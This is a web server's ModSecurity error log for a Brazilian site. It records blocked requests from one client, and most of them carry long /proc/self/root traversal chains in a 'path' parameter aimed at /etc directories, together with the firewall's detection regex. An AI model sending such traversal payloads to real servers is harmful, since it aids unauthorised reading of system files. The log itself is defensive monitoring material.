[Tue Mar 17 08:52:35.804633 2026] [:error] [pid 1210:tid 140411691570944] [client 74.7.243.203:52582] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAglKJy4A1bGlmj9BQNQAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:37.129159 2026] [:error] [pid 1210:tid 140411565680384] [client 74.7.243.203:52584] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAhVKJy4A1bGlmj9BQNgAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:38.448006 2026] [:error] [pid 1210:tid 140411708356352] [client 74.7.243.203:52594] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAhlKJy4A1bGlmj9BQOAAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:39.746410 2026] [:error] [pid 2325:tid 140411641214720] [client 74.7.243.203:52604] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAh-82sZHvlq4xgHq-AQAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:41.065114 2026] [:error] [pid 1016:tid 140411607643904] [client 74.7.243.203:38034] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAiZqmL8PQht4WJFlCWwAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:42.215649 2026] [:error] [pid 2325:tid 140411658000128] [client 74.7.243.203:38044] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAiu82sZHvlq4xgHq-AwAAAoo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:44.402851 2026] [:error] [pid 11293:tid 140411548894976] [client 74.7.243.203:38056] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAi9CmCSWTlPouqorGggAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:45.691360 2026] [:error] [pid 7000:tid 140411683178240] [client 74.7.243.203:38066] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAjRePVOt35XCGZP8q8AAAA4c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:46.838747 2026] [:error] [pid 2325:tid 140411582465792] [client 74.7.243.203:38074] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAju82sZHvlq4xgHq-BAAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:48.151261 2026] [:error] [pid 2305:tid 140411649607424] [client 74.7.243.203:38080] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAkAQohV2v-7oj5HH1-AAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:49.455159 2026] [:error] [pid 2305:tid 140411607643904] [client 74.7.243.203:38092] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAkQQohV2v-7oj5HH1-gAAAZA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:50.659043 2026] [:error] [pid 1210:tid 140411641214720] [client 74.7.243.203:59558] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAklKJy4A1bGlmj9BQOgAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:51.923318 2026] [:error] [pid 1961:tid 140411641214720] [client 74.7.243.203:59574] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAk3RXaaWotPICgYsfngAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:53.271640 2026] [:error] [pid 1961:tid 140411683178240] [client 74.7.243.203:59590] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAlXRXaaWotPICgYsfnwAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:55.679112 2026] [:error] [pid 7000:tid 140411624429312] [client 74.7.243.203:59594] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAlxePVOt35XCGZP8q9AAAA44"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:57.011069 2026] [:error] [pid 1210:tid 140411674785536] [client 74.7.243.203:59608] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAmVKJy4A1bGlmj9BQPQAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:52:58.299123 2026] [:error] [pid 2305:tid 140411674785536] [client 74.7.243.203:59618] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAmgQohV2v-7oj5HH1-wAAAYg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:53:06.355437 2026] [:error] [pid 2325:tid 140411632822016] [client 74.7.243.203:59628] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAou82sZHvlq4xgHq-EQAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:53:20.206950 2026] [:error] [pid 1210:tid 140411548894976] [client 74.7.243.203:50624] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAsFKJy4A1bGlmj9BQTAAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:53:24.399205 2026] [:error] [pid 11469:tid 140411683178240] [client 74.7.228.16:35846] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablAtJDEJR9VXonE_-1JEAAAAQc"]
[Tue Mar 17 08:53:39.112328 2026] [:error] [pid 7437:tid 140411624429312] [client 74.7.243.203:56568] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAwgeiSKl8TjouI-b9GwAAA84"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:53:44.101203 2026] [:error] [pid 2325:tid 140411691570944] [client 74.7.243.203:40248] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablAyO82sZHvlq4xgHq-GAAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
